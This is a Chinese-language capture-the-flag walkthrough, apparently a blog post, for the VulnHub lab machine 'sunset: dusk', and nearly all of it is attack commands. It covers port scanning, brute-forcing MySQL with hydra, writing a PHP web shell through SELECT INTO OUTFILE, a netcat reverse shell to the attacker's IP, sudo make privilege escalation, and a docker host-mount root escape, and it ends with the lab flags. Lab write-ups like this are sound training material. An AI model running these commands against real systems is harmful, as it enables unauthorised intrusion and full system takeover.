PJzhang:vulnhub靶机sunset系列SUNSET:DUSK
猫宁~~~
地址:https://www.vulnhub.com/entry/sunset-dusk,404/
重点关注工具和思路。
nmap 192.168.43.0/24
靶机IP
192.168.43.200
21/tcp open ftp
22/tcp open ssh
25/tcp open smtp
80/tcp open http
3306/tcp open mysql
8080/tcp open http-proxy
nmap -A -p1-65535 192.168.43.200,关注各个系统服务的版本漏洞
访问http://192.168.43.200:8080/,http://192.168.43.200/
成功,账户密码root/password
hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.43.200 mysql
进入数据库
mysql -h 192.168.43.200 -u root -P 3306 -p
select "<?php system($_GET['cmd']); ?>" into outfile '/var/tmp/muma.php' ;
http://192.168.43.200:8080/中可以看到muma.php,所在目录是/var/tmp
http://192.168.43.200:8080/muma.php?cmd=id
http://192.168.43.200:8080/raj.php?cmd=nc%20-e%20/bin/bash%20192.168.43.154%204444
nc -e /bin/bash 192.168.43.154 4444
攻击机nc -lvnp 4444
获得shell
python -c 'import pty;pty.spawn("/bin/bash")'
sudo -l
(dusk) NOPASSWD: /usr/bin/ping, /usr/bin/make, /usr/bin/sl
提权到dusk用户
sudo -u dusk make --eval=$'x:\n\t'/bin/bash
家目录
cat user.txt
08ebacf8f4e43f05b8b8b372df24235b
docker images
docker pull alpine
docker run -v /:/mnt -it alpine
获取了root权限
cd /mnt/root
cat root.txt
8930fa079a510ee880fe047d40dc613e